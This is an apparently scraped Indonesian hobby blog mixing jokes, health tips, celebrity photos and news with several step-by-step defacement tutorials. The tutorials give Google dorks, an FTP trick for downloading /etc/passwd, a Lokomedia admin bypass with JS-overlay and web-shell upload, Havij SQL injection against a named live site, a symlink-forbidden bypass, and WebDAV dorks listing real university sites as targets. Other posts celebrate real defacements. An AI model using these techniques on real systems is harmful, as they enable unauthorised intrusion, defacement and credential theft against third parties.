Hacking Shell Melalui FTP

Hacking Shell Melalui FTP - Deface :
Kali ini kita akan mengunakan Windows untuk mengetaui Password FTP file dari sebuah shell.

Cara ini menggunakan ftp protocol.Kebanyakan paswordnya id sembunyikan /shadowed, tapi kamu masih bisa mendapatkannya dg meng-finger atau menebak passwordnya untuk loginnya.
Kamu dapat memulainya dg membuka/memasuki sebuah shell, dan kamu tidak perlu/tidak harus menggunakan/ berada didalam sebuah ftp server.



Berikut Langkah-Langkahnya
  1. Jalankan prompt
  2. Tuliskan command untuk membuka dos command prompt
  3. Tuliskan ftp victim.com (nama server yg ingin di hacking !!)
  4. Akan muncul prompt login.. tekan enter saja 
  5. Akan muncul password login.. tekan saja enter
  6. Sekarang ketiklah “quote user ftp” dan tekan enter
  7. Lalu ketik “quote cwd ~root” tekan enter
  8. Dan ketikan “quote pass ftp” tekan enter Sekarang kamu sudah memiliki guest access dan dapat mendownload password file.
  9. Ketiklah “cd etc” tekan enter.. untuk mendapatkan -etc directory- yg berisi file password
  10. Ketiklah “get passwd” untuk mendownload passw.file ke HD mu.

Dengan demikian kita sudah memiliki password file dari victim dan kita dapat membukanya di C:\passwd dengan menggunakan notepad
Jika file tersebut di enkripsi.. kamu bisa meng-crack.. dan jika tidak dienkripsi..berarti anda berhasil
kamu dapat mencocokan antara user login dg passwordnya.

Sekian dulu dari Elephant-id Thanks to X-code

Kumpulan Gambar Lucu Minion

Kumpulan Gambar Lucu Minion- Gambar Lucu :
Minion adalah monster dalam film Despicable dengan tingkah aneh dan lucu di film animasi Despicable.

Membuat Seorang Minion menjadi banyak pengemar di dunia.







Berikut Foto-Foto Lucu Minion






















Sekian dulu Foto-foto lucu dari Minion

Google Palestina Hacked By Hacker Palestina

Google Palestina Hacked By Hacker Palestina - Hacking News : Google palestina diserang oleh hacker dari palestina .
Situs pencari yang beralamatkan http://google.ps/
Berubah tampilan nya sekitar 2 jam yang lalu sebelum berita ini di posting.

Motif penyerangan situs mesin pencari ini .
adlah untuk memintak negara palestina ada di goole maps.






Screen Shoot

 





Sekian dari Elephant-ID





Tips Menjaga Kesehatan Ginjal Anda

Tips Menjaga Kesehatan Ginjal Anda - Tips Kesehatan : Pasti sudah pada mendengar penyakit gagal gingal buka.
Penyajit yang cukup mematikan ini yang hanya dapat disembuhkan dengan cangkok ginjal ini.

Dari pada terlambat , lebih baik mencegah dari dini dengan bebarapan tips Tips Menjaga Kesehatan Ginjal Anda .





  • Mengatur pola makan merupakan tips ampuh menjaga dan merawat kesehatan ginjal anda. Pilihlah makanan seperti buah-buahan, sayur-sayuran yang aman dan segar.
  • Stop kebiasaan merokok merupakan langkah berikutnya yang sangat di anjurkan untuk menjaga kesehatan ginjal anda.
  • Memperbanyak meminum air putih untuk menghilangkan racun didalam tubuh.
  • Rajin berolahraga merupakan hal yang dapat dilakukan dengan mudah.
  • Usahakan tidak mengkonsumsi atau bahkan menghindari beberapa obat antibiotic dan anti nyeri. Ini dikarenakan dapat merusak ginjal anda.

Sekian dulu tips dari Elephant-id moga bisa Bermanfaat untuk kesehatan anda.

Pasang Iklan Anda Di Elephant-Id Blog

Pasang Iklan Anda Di Elephant-Id Blog - Admin : Hehe Postingan kali ini Elephan-id memberikan kesempatan buat kamu yang ingin memasang iklan di blog elephant-id.

Dengan anda mau memasang iklan anda di blog kami anda akan membantu blog kami untuk menjadi blog yang lebih baik.







Jika ingin Memasang Iklan Bisa Hubungi Di bawah ini

Fb : https://www.facebook.com/homeyzsamosir

Twitter : https://twitter.com/peter_Dody

Email : Chummy.hacker@gmail.com


Terima kasih atas Donasi anda.

Kumpulan Cerita Lucu Terbaru

Kumpulan Cerita Lucu Terbaru - Cerita Lucu :
Kembali lagi di Elephant-id , Kali ini saya akan share beberapa cerita lucu yang cocok untuk status fb kamu dan tweet kamu.

Mudah-mudahan setelah baca postingan ini anda yang lagi galau dapat terhibur dengan cerita lucu kami.











  •  Lebih baik wajah preman tapi hati beriman.
     Dari pada wajah security tapi hati hello kitty .
  •  Pacaran kok berantem terus, gak
     sekalian tawuran biar kayak anak
     STM :|
  • Arif : dod.. tato gambar ayam elu kemana. kok udah gak ada?
    dodi : udah hilang bro
    Arif : kok bisa
    Dodi : gara2 gw ketiduran.. eh ada kucing lewat... abis deh di makan
    Arif : makanya elu harus pinter2 klw buat gambar tato.. kayak gw nih
    Dodi : emg tato elu gambar apa?
    Arif : gambar tai ayam bro
    Dodi : *ambruk*bekap hidung*
  • Di sebuah kelas ada dosen yang bertanya ke mahasiswanya.:
    D : Apa ada yang pernah lihat tuhan?
    M : (diam semua)
    D : Apa ada yang pernah mendengar suara tuhan?
    M : (diam semua)
    D : Apa ada yang pernah menyentuh tuhan?
    M : (diam semua)
    D : Kesimpulannya berarti tuhan itu tidak ada.
    (dosen pun gembira)

    Tiba"ada mahasiswa yang tidak terima dan membalasnya.
    M : Apa ada yang pernah lihat otaknya dosen?
    (diam semua)
    M : Apa ada yang pernah mendengar suara otaknya dosen!
    (diam semua)
    M : Apa ada yang pernah menyentuh otaknya dosen?
    (diam semua)
    M : Kesimpulannya berarti dosen tidak punya otak.

    Semua mahasiswa pun bersorak gembira...
    hooooorreeee 
  • GURU VS ICAN

    -guru: can kenapa kamu telat?
    -ican: tadi ada teroris mau ledakin bom bu
    -guru: haah?? dimana??
    -ican: di game Point Blank bu
    -guru: huasemm luh, jalan jongkok duapuluh kali kamu
    xxxxxxx
    -guru: maaf ya ibu telat
    -ican: dari mana bu kok telat?
    -guru: tadi Ibu kesiangan nak
    -ican: gak bisa gitu bu, sana lari duapuluh kali di lapangan
    -guru: iya nak, jiiahh (sama gobloknya)
    xxxxx
    -guru: can kenapa kamu sering bolos?
    -ican: abisnya ujan mulu bu
    -guru: trus kalo hujan trus gimana?
    -ican: ya banjir bu
    -guru: %iya juga sih%
    xxxxxx
    -guru: yoga apa cita-citamu?
    -yoga: mau jadi dokter Bu, kalau Ibu sakit biar bisa obati Ibu dengan gratis
    -guru: bagus, kalau kamu can?
    -ican: mau jadi tukang gali kubur Bu
    -guru: loh kok gitu?
    -ican: kalo Ibu sakit kan di obati yoga, trus kalau sakitnya Ibu tambah parah kan mati, trus kan ada saya yang gali kuburan Ibu dengan gratis.
    xxxxxx
    -guru: can ngapain kamu gigitin bangku sekolah?
    -ican: kata temen ican kalau mau pintar harus makan bangku sekolah Bu Guru
    -guru#kejang-kejang langsung di kubur ican#


Sekian dulu dari Elephant-id Moga teman teman dapat terhibur


Kumpulan Foto-Foto Hot Aura Kasih

Kumpulan Foto-Foto Hot Aura Kasih -Entertainer :Pasti sudah banyak yang kenal sama artis yang satu ini.

Aura kasih dengan postur cantik dan seksi merupakan idola bagi kaum adam.

Berikut Foto-Foto Hot Aura Kasih




















Sekian Dulu dari Blog Elephant

Tips Unik Mengatasi Kesepian

Tips Unik Mengatasi Kesepian - Info Menarik :
Pasti kita pernahmengalami Kesepian .
kesepian bisa di sebab kan banyak seperti kita sendirian dan merindukan seseorang.

Banyak cara untuk menghilang kan kesepian seperti mendengarkan musik atau berhubungan dengan orang .






 Berikut Tips Unik Mengatasi Kesepian
  • Mulailah berbuat sesuatu untuk melakukan satu atau dua hal yang menyenangkan bagi anda.
  • Anda juga dapat mencari sisi lain kehidupan dengan memasuki sebuah komunitas baru seperti misalnya kursus memasak, mengikuti kelompok kerohanian atau mengkuti latihan bela diri. 
  • Mencari teman baru.
  • Mencoba terbuka terhadap orang lain


Sekian dulu tips dari Elephant-id

Deface Lokomedia Dengan JS Overlay Dan Shell

Deface Lokomedia Dengan JS Overlay Dan Shell - Deface : Teknik ini merupakan Teknik Perbaduan dari Teknik Js Overlay dan Bug Lokomedia.

Dork  Lokomedia
inurl:/media.php?module=berita
inurl:/admin/foto_berita
inurl:/admin/content.php?module=user
inurl:/adminweb/






  • Langsung saja Kita Exploit LOKOMEDIA
1.Search Google Pakai Dork Diatas

2. Kalo ketemu langsung aja ke exploit
http://site/admin/content.php?module=user

3. Kalo Muncul Kaya begini
[Image: 2rnddll.png]

berarti belum di patch tuh ama adminnya Sleepy saatnya kesempatan kita

4. Langsung aja Klik Pilihan Edit
nanti akan jadi kayak gini
[Image: 2mnnjn8.png]
Edit Sesuka hati anda, lalu klik save, Nanti akan otomatis disuruh login lalu login pakai ID & Pass yang sudah diganti tadi..

5. Kalo udah muncul kayak gini, terus di gmana'in ?
[Image: wj7whl.jpg]
Tinggal di Deface, Caranya? bisa pakai cara JS Overlay atau Tanem Shell
  • Saat nya kita masuk Ke JS OVERLAY
Buat dulu file JS atau apa pada website anda, bisa pakai site gratisan atau site yang sudah anda tanem shell

terus buat file misalkan devilscream.js
lalu isikan Script berikut

http://newbie-security.or.id/code/js-overlay.txt


Nah, biar Web Lokomedianya ke deface gmana?

Pada CMS Lokomedia masuk ke Menu Berita.
Kalo gak ada pilihan menu berita langsung ke URL

http://site/admin/media.php?module=berita

Kalo kagak bisa yah kagak bisa Dodgy

Lalu klik Add New Berita


  • Pada Bagian judul masukan Script berikut :
Code:
http://situs-anda-menyimpan-file-js-overlay/devilscream.js


Isi atau lainnya gak usah di isi gak apa-apa

Setelah itu save, percuma kalo gak di save Dodgy

Tanem Shell

Masuk ke Bagian menu Banner kalo gak ada juga pake URL http://site/admin/media.php?module=banner
kalo gak bisa juga yah emang nasib Dodgy

Atau gak cari Menu yang bisa upload file
[Image: 10i9nrp.jpg]

Setelah itu Klik AddNews

Pada Bagian Browse File Pilih Shell Kalian, yang lainnya gak usah diisi..

[Image: 2ikwcya.jpg]


Setelah di Upload masukin URL kaya gini
http://site/admin/foto_berita/nama_shell.php

kalau misalkan anda bukan di banner uploadnya
biasanya berada di http://site/files/nama_shell.php

Nah setelah itu Oprek deh Websitenya


Mungkin hanya itu tutorial saya, kalo ada salah maaf ya Cool

Thanks buat : BagsFreak untuk script JS-Overlay nya Big Grin

Sekian dan terima kasih...


Thanks ISD and Newbie- security

Google Ucapakan Selamat Kemerdekaan Indonesia

Google Ucapakan Selamat Kemerdekaan Indonesia - Internet :
Pertama Elephant-id Mengucakan Selmat Hari Kemerdekaan Indonesia yang ke 68.

Google juga Mengucakapkan hari kemerdekaan Untuk indonesia memalui tampilan awal pada
google.co.id dan google.com







  • www.google.co.id



  • www.goole.com


Sekian Dulu dari Elephant-iD
#MERDEKA






Pokok-Pokok Pidato Kenegaraan Presiden SBY

Pokok-Pokok Pidato Kenegaraan Presiden SBY - Info Menarik : Berakhir juga pidato kenegaraan dari Presiden SBY di kantor Dpr dan Mpr sore ini.
Bagi yang tidak sempat mendengar atau menonton pidato kenegaraan Presiden .

Berikut Pokok-Pokok dari Pidato kenegaraan Dari Presiden.




Pokok-pokok Pidato Kenegaraan Presiden SBY (16/8), meliputi ekonomi, toleransi, Pemilu 2014 dan kedaulatan NKRI.

  • Pembangunan ekonomi Indonesia ditopang oleh semakin baiknya iklim dunia usaha, stabilitas politik dan keamanan, serta masifnya gerakan kewirausahaan.
  • PDB per kapita Indonesia meningkat 102 % dari USD 1.177 pada tahun 2004 menjadi USD 3.592 pada tahun 2012. Insya Allah, akhir tahun 2014 akan mendekati USD 5.000.
  • Indonesia adalah bangsa majemuk yang berciri perbedaan. Utamakan dialog dan saling menahan diri, agar benturan dan kekerasan bisa diselesaikan.
  • Pemilu 2014 adalah saat dilahirkan pemimpin baru yang siap lanjutkan estafet pembaharuan dan kesinambungan. Pastikan tiap calon mempersiapkan diri dengan baik.
  • Konflik Aceh kita akhiri secara damai. Kini, Aceh membangun masa depan yang lebih sejahtera. Aceh dan Papua adalah bagian NKRI dan harga mati bagi Indonesia.
  • Orientasi Indonesia masa depan: Terus tingkatan kualitas SDM yang unggul. Generasi muda harus dibina menjadi generasi yang cerdas, tangguh dan toleran.

Dan bagi yang ingin meliat Test Pidatobisa langsung ke sini 
Teks Pidato Kenegaraan HUT Kemerdekaan ke-68 Republik Indonesia secara lengkap dapat diakses di http://www.presidenri.go.id/index.php/pidato/2013/08/16/2172.html


Sekian dulu dari blog Elephant-id


Sisi Lain Dari Unic29.Com

Sisi Lain Dari Unic29.Com  - Internet :
Dari namanya saja sudah pada penasaran bukan.
Website yang berbasis ke web portal media ini beralamatkan http://unic29.com/

Dengan memfokuskan untuk menyajikan konten-konten yang benar-benar unik dan aneh.
Cukup menarik untuk menjadi “The Largerst Indonesian Unique News Portal
Di Indonesia Bukan ?






Dengan memfokuskan untuk menyajikan konten-konten yang benar-benar unik dan aneh ,Unic29
Memiliki beberapa Label
  • #UNIK
Label satu ini merupakan membahas tentang keunik-unikan dari sebuah kejadian atau tindakan dari manusia dan hewan atau kebiasaan aneh yang tentunya unik yang belum dapat ditemukan pada web media lain.
  • #ANEH
Dari nama nya saja ANEH yah tentu saja kategori satu ini  mengulas tentang keanehan yang tejadi seperti Pemain Bola Dipecat Gara-Gara Menangis hahaha. Cukup aneh bukan ? pada kategori ini juga kalian dapat menemukan sisi unik
  • #LUCU
Kategori Ini adalah dimana postingan khusunya lebih menfokuskan artikel unik selain unik kita dapat merasa lucu dan tentunya bisa ketawak sendiri.
  • #SAINS
Kategori ini memfokuskan tentang teknologi-teknologi unik dan tentunya tidak boleh dilewatkan.
  • #MISTERI
Label satu ini tentunya seram buka dengan membahas info-info unik yang berbau misteri yang tentunya tidak boleh ketinggalan
  • #VIDEO
Kategori dimana kita menemukan video unik dan lucu.


Tidak asik buka kalok kita tidak kenal Founder sama admin dari Unic29.Com
FOUNDER & MANAGING DIRECTOR
Fawaz Rifqi

Chief Editor
Aris Prabowo

Author
Allam Farraz Setya
Galih Aldiansyah

Social Media Admin
Febry Nugraha
graphic design

Web Develover 
Rizqy Hidayat
Subraga Islammada
 
Graphic Design
Imam Dewanto

Website yang didirikan Tahun 10 Desember 2011 Memiliki  sapaan terhadap pembaca setia unic29 yaitu “Pren“. Jadi tidak perlu bingung saat Anda membaca konten dari unic29.com

Saat Ini Unic29.Com  Dapat di akses melalui web atau mobile


ScreenShoot Unic29.Com









Sekian Dulu sisi  Lain dari Unic29
Salam Elephant-iD

Situs Kepolisian Turki Hacked By Indonesia Security Down

Situs Kepolisian Turki Hacked By Indonesia Security Down - Hacking : Kali ini para defacer Indonesia beraksi lagi sebuah situs dari kepolisian turki di deface atau halaman depan nya di ganti.

Di himpun dari FansPage Indonesia Security Down mereka melakukan aksi hacking ini untuk Menyabut HUT RI 68.











Berikut Data dari situs kepolisian Turki ini

Site : http://www.polisemeklileriyardimlasmadernegi.com/


Screen



Mirror

mirror-m.org/mirror/2/wwwpolisemeklileriyardimlasmadernegicom.html

http://isd-team.org/mirror/5317/wwwpolisemeklileriyardimlasmadernegicom.html


 Sekian info hacker dari blog Elephant-id

Deface Dengan Iron Lava Corp Shell Upload

Deface Dengan Iron Lava Corp Shell Upload - Deface :Ini adalah teknik memanfaat kan Sql Injection dan dapat memakai teknik manual atau memakai Havij atau Sqlmap.

Kali ini saya akan mengunakan Teknik Sql mengunakan Havij supaya Lebih Mudah.
Bagi yang belum punya Havij bisa download disini kok Download






Dork Nya

"Site Design by Iron Lava Corp." inurl:index.php?pid= 
Bisa di tambahin Site:






-  Pilih target yang akan anda coba.
   saya memakai http://fourleg.com/index.php?pid=20

- Buka havij
- Masukan site
- Masuk ke administrator dan temukan password admin nya


- Password masih Md5 tinggal crack aja
- Untuk admin nya scan mengunakan menu Find Admin Di havij


Untuk upload shell :
setelah mendapatkan login pergi ke MANAGE IMAGES And upload shell kamu :)

lokasi shell : site/images/shell.php




Selamat mencoba all


Sekian dari Blog elephant-id

Cara Kembalikan Web Wordpess Yang Deface

Cara Kembalikan Web Wordpess Yang Deface - Deface : Pasti yang memakai jasa blogger dari web wordpress heran bukan liat blog nya ada tulisan hacked by bla bla.

Dipikaran orang awan blog nya kenak serangan hacker dan penguna blogger binggung untuk mengembalikan blog nya seperti semula.

Parah nya lagi anda tidak bisa login ke dasbord anda dan data base anda di delete

Berikut cara untuk kembalikan blog anda dari serangan hacker.




1. Ubah password Anda web hosting panel kontrol dengan mengakses cPanel.
2. Download cadangan dari situs wordpress seluruh Anda di FTP ke folder pada desktop Anda

  •  Login ke cPanel Anda, pergi ke bagian database, dan klik pada phpMyAdmin. Setelah itu beban, menemukan database untuk situs wordpress Anda di sidebar kiri dan klik di atasnya
  •  Klik pada "Ekspor" tab di kanan atas
  •   Pilih semua tabel.
  •   Di bagian bawah halaman pastikan "Save as file" kotak centang diperiksa dan tombol radio untuk "zip" dipilih untuk kompresi
  •  Klik tombol "Go" tombol ke kanan, dan ketika popup muncul, menyimpan file ke desktop Anda. Sekarang Anda telah menyimpan salinan database WordPress


3. Dalam FTP menghapus "htaccess." File di root situs Anda. Jika Anda tidak dapat melihatnya di FTP, hanya mengubah pilihan program FTP Anda untuk "Show hidden file" sehingga Anda dapat menemukan dan menghapusnya. Pastikan tidak ada file htaccess. Folder / wp-admin di root situs Anda.

4. Masih dalam FTP pergi ke / wp-content/plugins dan menghapus semua plugin. Kemudian hapus semua tema kecuali tema default WordPress dalam folder / wp-content/themes.

5. Dalam cPanel, klik installer WordPress Anda (misalnya: Fantastico, Softaculous) dan pilih WordPress untuk melihat instalasi yang sudah ada. Klik link untuk meng-upgrade versi WordPress.

6. Masuk ke dashboard WordPress dan menginstal ulang tema Anda bersama dengan plugin lainnya. Anda juga mungkin harus mengembalikan folder wp-content karena berisi semua upload Anda termasuk gambar blog.


Sekian tips dari blog Elephant-id

Cara Bypass Symlink Forbidden

Cara Bypass Symlink Forbidden - Deface :
Pasti pada binggung bukan  setelah jumping malah 404 Not found .
Kali ini saya akan memberikan tutor untuk bypass Symlink Forbidden .

Seperti namanya Bypass yang merupakan jalan pintas kita akan menjebol Symlink Forbidden tersebut dengan php.ini & htaccess






Berikut Tutor Bypass Symlink Forbidden
  1. Pertama buat satu file php dengan kode seperti dibawah
 safe_mode=OFF
disable_functions=NONE

Save as dengan Notepat nama name : php.in File type : all file

   2. Kemudian kita buat file .htaccess  Copy code dibawah

Options FollowSymLinks MultiViews Indexes ExecCGI
 
Paste dalam notepad dan save as Dengan nama : .htaccess File type : all file

  3. Upload ke dalam directory yang ada file config symlinknya


Semoga Berhasil Sekian dari blog elephant-id
Thanks to Xcroot and Indonesia Security Down

Deface Dengan Exploit FileChucker File Upload Vulnerability

Deface Dengan Exploit FileChucker File Upload Vulnerability - Deface : File Chucker merupakan bug yang terdapat pada front pengisian data pada suatu website:

Dengan mengisi form kita dapat menitipkan file deface kita.

Dork FileChucker File Upload Vulnerability
inurl:/cgi-bin/filechucker.cgi
intext:Toptown File Upload
inurl:/cgi-bin/filechucker.pl
intext:File Upload by Encodable






  • Cari Target saya mengunakan dork di atas ,  http://toptown.co.uk/cgi-bin/filechucker.cgi
  • Isi Form dengan data kalian
  • File yang bisa diupload yaitu .htm, .html, .txt, .jpg, .gif 




Sekian tutorial  Exploit FileChucker File Upload Vulnerability
Thanks To Indonesia Security Down and Newbie Boy
Semoga Bermanfaat DAri Elephant-id




Dork Webdav Vulnerability Terbaru

Dork Webdav Vulnerability Terbaru - Deface :Bagi Penguna Setia salah satu aplikasi yang di buat oleh hacker indonesia Hmei7 ini yang berfungsi menitipkan file atau shell ke suatu web yang vuln.







Berikut Dork Webdav Vulnerability Terbaru

intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache”
intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache” site:edu
intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache” site:gov
intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache” site:YOURCOUNTRY

Kita cari web target dengan memasukan Dork diatas kedalam pencarian Google, jika sudah keluar hasil penelusuranya kita tinggal pilih target dari hasil yang sudah ditampilkan google tadi. Caranya pada alamat url web target kita ketikan kata /webdav. Contoh: http://www.webtarget.com/webdav

Jika muncul halaman yang bertuliskan “WebDAV testpage”, berarti web tersebut dapat kita hack. Contohnya seperti web dibawah ini:
http://www.hebron.edu/webdav/
http://www.jcjc.edu/webdav/
http://archnet.asu.edu/webdav/
http://mvl.mit.edu/webdav/
http://www.engl.niu.edu/webdav/
http://www.mstc.edu/webdav/


Sekian dulu Dari Blog Elephant-id






Cara Mendapatkan Config Dalam Shell

Cara Mendapatkan Config Dalam Shell - Deface : Kebanyakan dalam beberapa domain memiliki server yang sama , dengan demikian dengan bermodal kan satu web yang sudah di tanam shell kita dapat memiliki seluruh akun yang berada pada satu server dengan web yang pertama Tutor kali ini mengunakan Shell Injection (Om-X Inject) Shell yang lain juga bisa asal kan memiliki menu Menu EVAL.





Langsung aja Tutor nya
  • Masuk ke Shell kita
  • Buka Menu Eval



  • Pada menu Eval yang kita buka terdapat echo file_get_contents('/etc/passwd'); Dan Klik GO


  •  Setelah nemu banyak data copy semua atau liat gambar


  • Setelah itu pegi ke munu Config yang ada di dalam shell Dan Paste kan Dan Klik Hajar


  • Selesai deh dan menemukan Config dan tinggal masuk di menu MYSQL






Nb: Tidak semua web memiliki satu sever dengan domain yang lain

Sekian tutot daei Elephant-id
Thanks To Xroot and Indonesi Security Down


Makna Hidup Bagi Sebagian Orang

Makna Hidup Bagi Sebagian Orang - Info menarik ;
Bagi sebagian orang hidup memiliki banyak arti dan tentunya lagi ada juga orang yang sudah lelah untuk hidup.

Seperti bumi yang berputar hidup juga memiliki dikala kita di atas maupun kita di bawah

Dengan demikian kita harus menghargai diri kita dan Tetap semangat.





Dari beberapa orang banyak makna atau arti hidup.

Hidup Adalah Ujian (Life is Test)
Hidup Adalah Harapan (Life is Hope)
Hidup Adalah Perjuangan (Life is Struggle)
Hidup Adalah Pembelajaran (Life is Learning)





Berikut beberapa kata kata mutiara tentang kehidupan.

“Jika anda berjalan di jalan yang benar dan anda bersedia untuk terus berjalan, anda akan menemukan Kebenaran dan membuat Kemajuan”
(Aristoteles)

“Jangan menyerah pada keadaan, tidak ada hal indah yang pernah dicapai kecuali oleh mereka yang Berani dan Percaya sesuatu didalam diri mereka itu mengungguli keadaan”
(Thomas Alfa Edison)

“Pertempuran hidup tak selalu dimenangkan, oleh orang yang lebih kuat, lebih hebat atau lebih cepat, karena cepat atau lambat, dia yang berjaya, adalah dia yang berpikir dia bisa”
(Eleanor Roosevelt)

“Hidup tidak mudah bagi kita. Tapi, apa itu Hidup? Hidup adalah ketekunan dan berdiri dengan keyakinan, serta kita harus percaya bahwa kita dikaruniai sesuatu untuk mencapai tujuan”
(Madame Curie)

“Hidup adalah seni mengatasi masalah dan menentukan pilihan. Bersama harapan, harapan adalah kebutuhan disegala kondisi kehidupan”
(Mahatma Gandhi)




Sekian dulu dari Blog Elepahant-id
Jika copas harap sertakan sumber

Download Miranda 0.10.16 Terbaru

Download Miranda 0.10.16 Terbaru - Software : Miranda IM adalah multi-protokol instant messenger client untuk Windows.

Miranda IM menggunakan memori sangat kecil dan sangat cepat. Hal ini tidak memerlukan instalasi dan dapat dipasang pada floppy disk tunggal. Sistem plugin yang kuat membuat Miranda IM sangat fleksibel

Hanya fitur yang paling dasar dibangun, tapi saat ini ada lebih dari 350 plugin gratis yang tersedia untuk di-download yang memungkinkan pengguna untuk memperluas fungsi Miranda IM.







Berikut beberapa Protokol yang tersedia
  • AIM (AOL Instant Messenger)
  • IRC (Internet Relay Chat)
  • IAX (Inter-Asterisk Bursa)
  • MSN
  • Yahoo
  • Netsend

Screen






Jika ingin mendownload klik Download   

Sekian dulu dari blog elephant-id